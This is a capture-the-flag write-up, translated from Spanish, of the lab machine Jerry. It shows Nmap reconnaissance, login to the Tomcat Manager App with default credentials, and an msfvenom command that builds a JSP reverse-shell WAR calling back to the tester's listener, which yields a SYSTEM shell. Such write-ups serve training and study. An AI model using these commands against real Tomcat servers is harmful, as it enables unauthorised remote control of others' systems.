This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.

Description

In this write-up, we cover the Easy machine Jerry. We exploit Tomcat through the Manager App by deploying a malicious .war application containing a reverse shell, giving us system administrator access.

Reconnaissance

Port Reconnaissance

The first step is to identify the open ports on the target machine using Nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
cat Puertos
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: Puertos
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ nmap --open -p- -T5 -Pn -oG Puertos 10.10.10.95
2 │ Host: 10.10.10.95 () Status: Up
3 │ Host: 10.10.10.95 () Ports: 8080/open/tcp//http-proxy/// Ignored State: filtered (65534)
4 │ # Nmap done at Tue Jul 12 01:26:25 2022 -- 1 IP address (1 host up) scanned in 68.44 seconds
───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
❯ Reconocimiento Puertos

{*} Extrayendo puertos...

La direccion ip es: 10.10.10.95
Los puertos abiertos son: 8080

Los puertos han sido copiados al portapapeles

Knowing that only port 8080 is open, we run Nmap’s default scripts against it.

1
2
3
4
5
6
7
8
9
1   │ nmap -sCV -p8080 -Pn -oN Objetivos 10.10.10.95
2 │ Nmap scan report for 10.10.10.95
3 │ Host is up (0.034s latency).
4 │
5 │ PORT STATE SERVICE VERSION
6 │ 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
7 │ |_http-title: Apache Tomcat/7.0.88
8 │ |_http-favicon: Apache Tomcat
9 │ |_http-server-header: Apache-Coyote/1.1

The web server is running Tomcat, so we inspect the website and the access points available to us.

Web Reconnaissance

Visiting the website reveals Tomcat’s default page.

If we can access the Manager App, we may be able to upload a malicious .war file that establishes a reverse shell.

We try to access it, but it requests credentials:

Submitting invalid credentials produces this Tomcat error.

Looking closely at the following line, we can see Tomcat’s default credentials:

1
2
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>

Hopefully the administrator has not left these credentials unchanged. That would be a rookie mistake, would it not?

Accessing the Manager App

We try tomcat:s3cret and, boom, access is granted.

At the bottom of the page, we find the following section.

It appears that we can upload a .war file, allowing us to deploy a malicious application. We can generate it with msfvenom; HackTricks provides a cheat sheet for this .war attack.

Potential Paths

Creating the WAR Reverse Shell with Msfvenom

We supply the appropriate reverse shell parameters:

1
2
3
4
❯ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=1234 -f war -o revshell.war
Payload size: 1088 bytes
Final size of war file: 1088 bytes
Saved as: revshell.war

Before uploading and running the malicious application, we start a netcat listener.

1
2
❯ rlwrap nc -lnvp 1234 # rlwrap nos permite obtener una tty interactiva con windows
listening on [any] 1234 ...

Uploading the Reverse Shell

We can now upload the .war file from the menu shown earlier.

Once uploaded, the application appears in the Manager App menu.

Running the Reverse Shell

Visiting http://10.10.10.95:8080/revshell/ executes the reverse shell, which connects to the listener we established earlier.

1
2
3
4
5
6
7
8
9
10
11
❯ rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.95] 49193
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>

Perfect! The Tomcat process appears to be running as nt authority\system, so all that remains is to find the flags.

Flags

User.txt and Admin.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
dir

Directory of C:\Users\Administrator\Desktop\flags

06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 2,419,621,888 bytes free

type "2 for the price of 1.txt"

user.txt
7004xxxxxxxxxxxxxxxxxxxxxxxxxxxx

root.txt
04a8xxxxxxxxxxxxxxxxxxxxxxxxxxxx

Both flags were stored in the same file, so we can consider Jerry pwned.

Knowledge Gained

The Jerry machine teaches us the following:

  • Open-port reconnaissance with Nmap.
  • Web reconnaissance to find credentials.
  • Creating a .war reverse shell with Msfvenom.
  • Deploying a .war file through Tomcat’s Manager App.

Credits and References

Machine author: mrh4sh. Thank you for creating Jerry and contributing it to the community.